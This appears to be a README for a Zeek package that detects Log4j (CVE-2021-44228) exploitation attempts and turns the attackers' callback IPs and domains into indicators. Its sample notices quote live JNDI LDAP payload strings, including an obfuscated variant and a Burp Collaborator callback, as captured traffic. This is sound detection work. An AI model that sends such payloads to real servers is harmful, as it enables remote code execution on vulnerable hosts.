log4j


Simple policy to detect CVE_2021_44228 aka Log4j

The script provides the following functionality:

1) The Log4j Zeek package identifies CVE_2021_44228 exploitation attempts
2) It extracts the callback IP + domain and watches them
3) It builds realtime IoCs from these attacks and adds them to the intel-framework in realtime

Installation

zeek-pkg install zeek/initconf/log4j, or @load log4j/scripts

Detailed Notes:

Alerts and descriptions: the script generates the following kinds of notices:

  • Log4j::Attempt
  • Log4j::CallBackIP
  • Log4j::CallBack

Example notice:

XXXXXXXXXX.XXXXXX CmES5u32sYpV7JYN 45.131.195.245 18677 12.23.36.5 80 - - - tcp Log4j::Attempt Malicious user agent Mozilla/5.0 ${jndi:ldap://45.58.177.50:1389/Rsc} seen from host 45.131.195.245 - 45.131.195.245 12.23.36.5 80 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - - --

XXXXXXXXXX.XXXXXX - 45.131.195.245 18677 12.23.36.5 80 - - - tcp Log4j::CallBackIP Callback IP [45.58.177.50] seen from host 45.131.195.245 with payload of [[uri=45.58.177.50:1389/Rsc, uri_path=Rsc, stem=45.58.177.50:1389, host=45.58.177.50, port=1389/tcp]] - 45.58.177.50 12.23.36.5 80 - - Notice::ACTION_LOG (empty)86400.000000 - - - - - - -

XXXXXXXXXX.XXXXXX CDI95K1GQpHhlE1WO3 192.168.86.35 64759 45.58.177.50 1389 - - - tcp Log4j::CallBack Possible Successful Callback seen [45.58.177.50:1389/tcp] : attack connection [orig_h=45.131.195.245, orig_p=18677/tcp, resp_h=12.23.36.5, resp_p=80/tcp] - 45.58.177.50 45.58.177.50 1389 - - Notice::ACTION_LOG (empty)1800.000000

Complex regexps:

XXXXXXXXXX.XXXXXX ClEkJM2Vm5giqnMf4h 149.209.6.114 45754 131.177.124.168 80 - - - tcp Log4j::Attempt Malicious user agent ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://185.254.196.236:1389/jijec} seen from host 149.209.6.114 - 149.209.6.114 131.177.124.168 80 - - Notice::ACTION_LOG (empty) 3600.000000

Embedded domains:

XXXXXXXXXX.XXXXXX CtPZjS20MLrsMUOJi2 14.36.22.37 34404 134.93.97.18 80 - - - tcp Log4j::Attempt Malicious user agent Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@${jndi:ldap://User-Agent.blah.com.jg33feb5c7b2ui8djt4bb9dntez6nv.burpcollaborator.net/a.bc} seen from host 14.36.22.37 - 14.36.22.37 134.93.97.18 80 - - Notice::ACTION_LOG (empty) 3600.000000

The package also resolves the embedded domain and watches for the resolved IP/port:

XXXXXXXXXX.XXXXXX - 14.36.22.37 34404 134.93.97.18 80 - - - tcp Log4j::CallBackIP Callback IP [52.16.21.24] seen from host 14.36.22.37 with payload of [[uri=User-Agent.blah.com.jg33feb5c7b2ui8djt4bb9dntez6nv.burpcollaborator.net/a.bc, uri_path=a.bc, stem=User-Agent.blah.com.jg33feb5c7b2ui8djt4bb9dntez6nv.burpcollaborator.net, host=52.16.21.24, port=80/tcp]] - 52.16.21.24 134.93.97.18 80 - - Notice::ACTION_LOG (empty) 86400.000000

Example Summary Notice:

Package Version: